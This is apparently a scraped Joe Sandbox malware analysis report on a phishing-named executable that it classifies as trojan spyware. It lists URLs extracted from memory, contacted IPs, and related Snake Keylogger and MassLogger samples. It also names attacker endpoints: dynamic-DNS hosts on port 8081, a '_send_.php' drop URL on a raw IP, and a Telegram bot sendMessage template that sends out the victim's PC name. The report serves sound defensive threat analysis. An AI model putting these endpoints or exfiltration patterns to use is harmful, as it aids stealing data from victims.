                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813435%0D%0ADate%20aInstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designers?RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                            high
                                                            https://www.office.com/lBInstallUtil.exe, 00000005.00000002.2990704063.0000000002D8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://chrome.google.com/webstore?hl=enpInstallUtil.exe, 00000005.00000002.2990704063.0000000002D52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.tiro.comRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.fontbureau.com/designersRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                                        high
                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallUtil.exe, 00000005.00000002.2994301420.0000000003F1F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E1C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002CA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.goodfont.co.krRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://chrome.google.com/webstore?hl=enInstallUtil.exe, 00000005.00000002.2990704063.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://varders.kozow.com:8081RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.sajatypeworks.comRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.typography.netDRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.founder.com.cn/cn/cTheRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                                                        high
                                                                                        http://www.galapagosdesign.com/staff/dennis.htmRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.office.com/pInstallUtil.exe, 00000005.00000002.2990704063.0000000002D83000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallInstallUtil.exe, 00000005.00000002.2994301420.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E23000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003EFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchInstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://checkip.dyndns.org/qRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://chrome.google.com/webstore?hl=enlBInstallUtil.exe, 00000005.00000002.2990704063.0000000002D5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.galapagosdesign.com/DPleaseRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.fonts.comRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.sandoll.co.krRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.urwpp.deDPleaseRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.zhongyicts.com.cnRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.sakkal.comRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                                                                                    high
                                                                                                                    https://reallyfreegeoip.org/xml/RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                                                                                        high
                                                                                                                        https://www.office.com/InstallUtil.exe, 00000005.00000002.2990704063.0000000002D92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002D83000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.apache.org/licenses/LICENSE-2.0RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.fontbureau.comRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://sectigo.com/CPS0RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                                                                                                high
                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoInstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
Name | Source | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org | InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | InstallUtil.exe, 00000005.00000002.2994301420.0000000003F1F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E1C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot/sendMessage?chat_id=&text= | InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.carterandcone.coml | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://aborters.duckdns.org:8081 | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.founder.com.cn/cn/ | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478037027.0000000006850000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com/designers/cabarga.htmlN | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.founder.com.cn/cn | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com/designers/frere-user.html | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://anotherarmy.dns.army:8081 | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | false | - | high
http://www.jiyu-kobo.co.jp/ | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://reallyfreegeoip.org/xml/8.46.123.189$ | InstallUtil.exe, 00000005.00000002.2990704063.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://reallyfreegeoip.org | InstallUtil.exe, 00000005.00000002.2990704063.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com/designers8 | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | InstallUtil.exe, 00000005.00000002.2994301420.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E23000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003EFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C80000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://ocsp.sectigo.com0B | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | false | Avira URL Cloud: safe | unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.48.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
104.21.80.1 | unknown | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587370
Start date and time: 2025-01-10 09:27:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@4/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 156
• Number of non-executed functions: 30
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 2.23.242.162, 20.12.23.50, 13.107.246.45, 172.202.163.200
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
Time | Type | Description
03:28:14 | API Interceptor | 226x Sleep call for process: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe modified
03:29:19 | API Interceptor | 1887x Sleep call for process: InstallUtil.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.48.1 | SH8ZyOWNi2.exe | malicious | CMSBrute | twirpx.org/administrator/index.php
104.21.48.1 | SN500, SN150 Spec.exe | malicious | FormBook | www.antipromil.site/7ykh/
149.154.167.220 | https://marcuso-wq.github.io/home/ | malicious | HTMLPhisher | -
149.154.167.220 | https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html | malicious | HTMLPhisher | -
149.154.167.220 | dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | Nuevo pedido.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | Benefit_401k_2025_Enrollment.pdf | malicious | Unknown | -
149.154.167.220 | gem1.exe | malicious | Unknown | -
149.154.167.220 | Copy shipping docs PO EV1786 LY ECO PAK EV1.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | -
193.122.130.0 | Tepe - 20000000826476479.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | SOA NOV. Gateway Freight_MEDWA0577842.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | Tepe - 20000000826476479.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | Nuevo pedido.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | VSLS SCHEDULE_pdf.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | ungziped_file.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | New order 2025.msg | malicious | PureLog Stealer, Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | file.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | image.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              checkip.dyndns.comTepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                                              PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                              • 158.101.44.242
                                                                                                                                                                                              SOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 132.226.247.73
                                                                                                                                                                                              fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 132.226.247.73
                                                                                                                                                                                              fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 132.226.8.169
                                                                                                                                                                                              1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 132.226.247.73
                                                                                                                                                                                              jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 132.226.8.169
                                                                                                                                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                                              reallyfreegeoip.orgTepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 104.21.32.1
                                                                                                                                                                                              PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                              • 104.21.80.1
                                                                                                                                                                                              SOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 104.21.96.1
                                                                                                                                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 104.21.96.1
                                                                                                                                                                                              fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                                              fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 104.21.112.1
                                                                                                                                                                                              1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 104.21.96.1
                                                                                                                                                                                              jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 104.21.16.1
                                                                                                                                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 104.21.16.1
                                                                                                                                                                                              api.telegram.orghttps://marcuso-wq.github.io/home/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              gem1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              CLOUDFLARENETUShttps://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.66.43.95
                                                                                                                                                                                              http://www.singhs.lvGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                              • 104.18.11.207
                                                                                                                                                                                              http://18ofcontents.shopGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.96.1
                                                                                                                                                                                              https://www.dcamarketintelligence.com/tdtGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.26.15.92
                                                                                                                                                                                              1162-201.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                                              https://cdn.btmessage.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 172.67.74.232
                                                                                                                                                                                              http://www.austrata.net.auGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 1.1.1.1
                                                                                                                                                                                              https://www.cineuserdad.ecGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              https://form.fillout.com/t/emEtLm993dusGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.26.1.150
                                                                                                                                                                                              https://form.fillout.com/t/emEtLm993dusGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.17.25.14
                                                                                                                                                                                              TELEGRAMRUhttps://marcuso-wq.github.io/home/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
